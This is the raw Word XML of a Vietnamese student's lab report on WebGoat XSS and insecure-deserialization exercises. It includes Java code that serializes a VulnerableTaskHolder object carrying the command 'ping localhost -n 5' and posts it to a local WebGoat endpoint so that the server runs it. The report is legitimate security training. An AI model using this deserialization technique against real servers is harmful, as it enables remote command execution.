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BA848A" w14:textId="77777777" w:rsidR="00CD12F2" w:rsidRPr="00F9595F" w:rsidRDefault="00CD12F2" w:rsidP="0033648A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1350"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9595F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Họ và tên:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9595F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>Lý Thành Đạt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7B54A3" w14:textId="4EEBCC95" w:rsidR="00CD12F2" w:rsidRPr="00F9595F" w:rsidRDefault="00CD12F2" w:rsidP="0033648A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1350"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9595F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MSSV:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9595F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>17110278</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EE13FC" w14:textId="52BDEF82" w:rsidR="00DF39D8" w:rsidRPr="00F94EB4" w:rsidRDefault="00CD12F2" w:rsidP="0033648A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="135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595F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nội dung:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9595F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>Thực hành XSS - Insecure Deserialization</w:t>
      </w:r>
      <w:r w:rsidR="006820F0" w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="214879B3" wp14:editId="1392CC3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F19D" w14:textId="59C142B2" w:rsidR="006820F0" w:rsidRPr="00F94EB4" w:rsidRDefault="006820F0" w:rsidP="003170B2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D57F0FC" wp14:editId="402B574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8E10" w14:textId="543F2549" w:rsidR="006820F0" w:rsidRPr="00F94EB4" w:rsidRDefault="006820F0" w:rsidP="003170B2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FFC4E17" wp14:editId="163A439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34EB" w14:textId="68C083D4" w:rsidR="006820F0" w:rsidRPr="00F94EB4" w:rsidRDefault="006820F0" w:rsidP="003170B2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C8E583F" wp14:editId="5B5B89D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6E4D" w14:textId="11581B13" w:rsidR="00F13DB3" w:rsidRPr="00F94EB4" w:rsidRDefault="00D247B2" w:rsidP="003170B2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6614EE3A" wp14:editId="0589C50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5B99" w14:textId="409AF1F9" w:rsidR="00D247B2" w:rsidRPr="00F94EB4" w:rsidRDefault="00D247B2" w:rsidP="003170B2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5421782D" wp14:editId="4149A06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A88A" w14:textId="787EC187" w:rsidR="00D247B2" w:rsidRPr="00F94EB4" w:rsidRDefault="000221CB" w:rsidP="003170B2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AC9E9ED" wp14:editId="283AF2B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50D4" w14:textId="0B6C8A5B" w:rsidR="000221CB" w:rsidRPr="00F94EB4" w:rsidRDefault="000221CB" w:rsidP="003170B2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ta có baseroute là start.mvc#lesson/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E04839F" w14:textId="4BCA281A" w:rsidR="000221CB" w:rsidRPr="00F94EB4" w:rsidRDefault="000221CB" w:rsidP="003170B2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Theo bảng giá trị ta thấy sẽ có testRoute tương tự lessonRoute =&gt; giá trị thay vào lesson parameter là test</w:t>
      </w:r>
      <w:r w:rsidR="00827FDC" w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00F93780" w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Đáp án là </w:t>
      </w:r>
      <w:r w:rsidR="00827FDC" w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>start.mvc#test/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DA23B2" w14:textId="0E3DA874" w:rsidR="000221CB" w:rsidRPr="00F94EB4" w:rsidRDefault="000221CB" w:rsidP="003170B2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FF99076" wp14:editId="247CB5F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14B3" w14:textId="4EB468C2" w:rsidR="00072B8A" w:rsidRPr="00F94EB4" w:rsidRDefault="00684C43" w:rsidP="003170B2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="236D3E54" wp14:editId="34E84BE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A8C6" w14:textId="12D6A4A1" w:rsidR="00684C43" w:rsidRPr="00F94EB4" w:rsidRDefault="00684C43" w:rsidP="003170B2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3029C65D" wp14:editId="4C6B211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7ED1" w14:textId="18E3ECF5" w:rsidR="00431BAB" w:rsidRPr="00F94EB4" w:rsidRDefault="00431BAB" w:rsidP="003170B2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B062E92" w14:textId="7E096C72" w:rsidR="00431BAB" w:rsidRPr="00F94EB4" w:rsidRDefault="00431BAB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Code tạo serialized object string code cho phép server </w:t>
      </w:r>
      <w:r w:rsidR="007C4B98" w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>delay</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> trong 5s</w:t>
      </w:r>
      <w:r w:rsidR="007C4B98" w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>submit</w:t>
      </w:r>
      <w:r w:rsidR="00B456C3" w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> và bonus gửi nhận trên console. Cần xác định </w:t>
      </w:r>
      <w:r w:rsidR="00B456C3" w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve">serialVersionUID = 2 </w:t>
      </w:r>
      <w:r w:rsidR="00B456C3" w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Vì theo hướng dẫn và bài 3 ta đã có </w:t>
      </w:r>
      <w:r w:rsidR="00B456C3" w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve">serialVersionUID = 1 </w:t>
      </w:r>
      <w:r w:rsidR="00B456C3" w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>và next là 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC9A3D7" w14:textId="259456C9" w:rsidR="00501041" w:rsidRPr="00F94EB4" w:rsidRDefault="009521DE" w:rsidP="003170B2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Câu lệnh thực thi: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>ping localhost -n 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAE2D8A" w14:textId="571234B6" w:rsidR="00501041" w:rsidRPr="00F94EB4" w:rsidRDefault="00501041" w:rsidP="003170B2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Để code gen ra chính xác đoạn </w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">serialized object ta cần để đúng package theo vị trí của class VulnerableTaskHolder được xác định tại org.dummy.insecure.framework để có thể thực hiện lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>readObject()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">của file class ấy trên server nhằm thực thi câu lệnh như trên là </w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>ping localhost -n 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFB55E4" w14:textId="03353940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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66D3EDC5" wp14:editId="7C8B3F0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0A84" w14:textId="1C172618" w:rsidR="002D1E13" w:rsidRPr="00F94EB4" w:rsidRDefault="002D1E1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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72CC6104" wp14:editId="303C806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3A6A" w14:textId="0E0A9031" w:rsidR="002D1E13" w:rsidRPr="00F94EB4" w:rsidRDefault="002D1E13" w:rsidP="003170B2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="464A4F10" w14:textId="2B79CCE5" w:rsidR="002D1E13" w:rsidRPr="00F94EB4" w:rsidRDefault="002D1E13" w:rsidP="003170B2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AB62BFA" w14:textId="77777777" w:rsidR="0085521B" w:rsidRPr="00F94EB4" w:rsidRDefault="0085521B" w:rsidP="003170B2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D93DA57" w14:textId="4FB339A4" w:rsidR="002D1E13" w:rsidRPr="00F94EB4" w:rsidRDefault="002D1E1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>Source code</w:t>
      </w:r>
      <w:r w:rsidR="002710FC" w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> gồm 2 file: Main.java và VulnerableTaskHolder.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B7330E" w14:textId="6F9406ED" w:rsidR="00072554" w:rsidRPr="00F94EB4" w:rsidRDefault="00072554" w:rsidP="003170B2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Main.java: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFCC53A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>package org.dummy.insecure.framework;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42274DA9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</w:p>
    <w:p w14:paraId="78DB3584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>import java.io.ByteArrayOutputStream;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA10317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>import java.io.ObjectOutputStream;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18003FD5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>import java.util.Base64;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9D83E0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</w:p>
    <w:p w14:paraId="21D91CBE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</w:p>
    <w:p w14:paraId="21305BE0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lastRenderedPageBreak/>
        <w:t>import java.io.BufferedReader;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5741525A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>import java.io.InputStreamReader;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00012675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>import java.io.ObjectInputStream;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472D0F39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>import java.net.HttpURLConnection;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ADEACE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import java.net.URL; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7915B427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</w:p>
    <w:p w14:paraId="50AD3BC5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>public class Main {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DADB4C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static public void main(String[] args){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071BA736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try{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEA89B9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VulnerableTaskHolder go = new VulnerableTaskHolder("sleep", "ping localhost -n 5");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B26682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ByteArrayOutputStream bos = new ByteArrayOutputStream();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31135D13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ObjectOutputStream oos = new ObjectOutputStream(bos);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE65F31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oos.writeObject(go);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DECAF7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oos.flush();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1D62B6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byte[] exploit = bos.toByteArray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E60B90E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String exp = Base64.getEncoder().encodeToString(exploit);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA83F3B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System.out.println(exp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448E78B3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call_me(exp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B942B2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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66406E12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// ObjectInputStream ss = call_me(exp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CB8659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} catch (Exception e){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEDEE0F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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D2743E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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C22A3E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</w:p>
    <w:p w14:paraId="6BDB5D72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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599CBED8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public static void call_me(String rs) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D525BFA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String url = "http://localhost:7777/WebGoat/InsecureDeserialization/task/?token=" + rs;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9F7B29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URL obj = new URL(url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004498C2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HttpURLConnection con = (HttpURLConnection) obj.openConnection();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A4FB2E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// optional default is GET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E44F019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con.setRequestMethod("POST");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BBD5E2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//add request header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72092108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con.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63451941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con.setRequestProperty("Host", "localhost:7777");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE6BB6F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con.setRequestProperty("Accept", "*/*");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB195F2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con.setRequestProperty("Accept-Language", "vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D2523C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con.setRequestProperty("Accept-Encoding", "gzip, deflate");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A9A229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con.setRequestProperty("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABEDAFC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con.setRequestProperty("X-Requested-With", "XMLHttpRequest");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E3B216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con.setRequestProperty("Content-Length", "324");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7833ED33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con.setRequestProperty("Origin", "http://localhost:7777");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1FBD5A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con.setRequestProperty("Connection", "close");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB02168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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        con.setRequestProperty("Referer", "http://localhost:7777/WebGoat/start.mvc");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFE420F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con.setRequestProperty("Cookie", "JSESSIONID=iIQ0krqSM9sGesB1VA67nGUUDPv-11phR9C65ITt");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2F46F7" w14:textId="6F561E80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int responseCode = con.getResponseCode();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC25F5A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System.out.println("\nSending 'GET' request to URL : " + url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED0CF92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System.out.println("Response Code : " + responseCode);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB7DFA4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BufferedReader in = new BufferedReader(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680B7AFB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    new InputStreamReader(con.getInputStream()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B79D84F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String inputLine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6C2278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StringBuffer response = new StringBuffer();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B733248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while ((inputLine = in.readLine()) != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5CC216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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>response.append(inputLine);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8E75E0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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164CC87A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in.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB3A958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//print in String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79745135" w14:textId="77777777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System.out.println(response.toString());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178CA51A" w14:textId="77777777" w:rsidR="007377CF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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E70DD7A" w14:textId="5D5B6DB5" w:rsidR="00B456C3" w:rsidRPr="00F94EB4" w:rsidRDefault="00B456C3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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7509B3" w14:textId="101B9CDE" w:rsidR="00B456C3" w:rsidRPr="00F94EB4" w:rsidRDefault="001E4836" w:rsidP="003170B2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VulnerableTaskHolder.java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360C84DF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>package org.dummy.insecure.framework;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1952218D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</w:p>
    <w:p w14:paraId="7EDDDD16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>import java.io.BufferedReader;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20777E0B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lastRenderedPageBreak/>
        <w:t>import java.io.IOException;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232B38F3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>import java.io.InputStreamReader;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C348AA8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>import java.io.ObjectInputStream;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B83AB5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>import java.io.Serializable;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B0E5E8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>import java.time.LocalDateTime;</w:t>
      </w:r>
    </w:p>
